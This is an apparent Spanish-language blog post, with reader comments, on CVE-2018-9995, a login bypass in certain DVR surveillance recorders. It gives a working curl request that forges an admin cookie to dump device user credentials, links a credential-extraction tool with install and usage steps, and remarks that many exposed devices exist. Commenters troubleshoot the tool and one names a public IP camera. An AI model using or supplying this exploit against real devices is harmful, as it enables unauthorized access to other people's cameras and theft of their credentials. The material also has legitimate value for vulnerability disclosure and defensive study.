lunes, 30 de abril de 2018

[update] DVR Login Bypass ( CVE-2018-9995 )

En un articulo anterior presente una vuln que me permitía obtener las credenciales de cierto modelo de DVR.

Tan simple como:


$> curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
Resulta que el hallazgo no corresponde a un vendor en particular como originalmente supuse.




Me encontraba boceteando una tool para facilitarme de manera amigable la extracción de esas credenciales y en el camino me tope con nuevos banners que en algunos casos representan a su vendor:



















etc...

Finalmente una vez adentros son todos iguales (de vulnerables).










On The Wild:







Claramente los equipos expuestos no son pocos ! 

TOOL:
Ahora si:

https://github.com/ezelf/CVE-2018-9995_dvr_credentials

Quick start


usr@pwn:~$ git clone https://github.com/ezelf/CVE-2018-9995_dvr_credentials.git
usr@pwn:~$ cd CVE-2018-9995_dvr_credentials
usr@pwn:~$ pip install -r requirements.txt



help

usage: getDVR_Credentials.py [-h] [-v] --host HOST [--port PORT]

[+] Obtaining Exposed credentials

optional arguments:
  -h, --help     show this help message and exit
  -v, --version  show program's version number and exit
  --host HOST    Host
  --port PORT    Port

[+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81





Saludos,





14 comentarios:

  1. Sir , I am getting an error "ImportError : No module named requests."

    ResponderEliminar
  2. Señor, recibo un error "ImportError: ningún módulo llamado solicitudes".

    ResponderEliminar
  3. Señor,I am getting another error,
    ['charmap' codec cant't encode character u'\u256d' in position 0: character maps to (undefined)].
    What should I do ?

    ResponderEliminar
  4. qual ferramenta você usa para visualizar o vídeo?
    porque meu navegador não me mostra nada

    ResponderEliminar
    Respuestas
    1. Ud necesita debe usar "Internet Explorer", (+windows)

      Eliminar
  5. Este comentario ha sido eliminado por el autor.

    ResponderEliminar
    Respuestas
    1. (dormido borre accidentalmente su comentario xd).

      Eliminar
  6. Buenas señor, me aparece la siguiente linea
    [+] Error: No JSON object could be decoded
    [>] json:

    ResponderEliminar
  7. DVR incorrecto(no vuln) entonces.
    use:
    $> curl "http://{DVR_HOST_IP}:{PORT}/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

    ResponderEliminar
  8. what if ihave camera ip like that http://196.75.155.249

    ResponderEliminar
    Respuestas
    1. Vendor("hikvision") Not Vuln to CVE-2018-9995 !!!

      Eliminar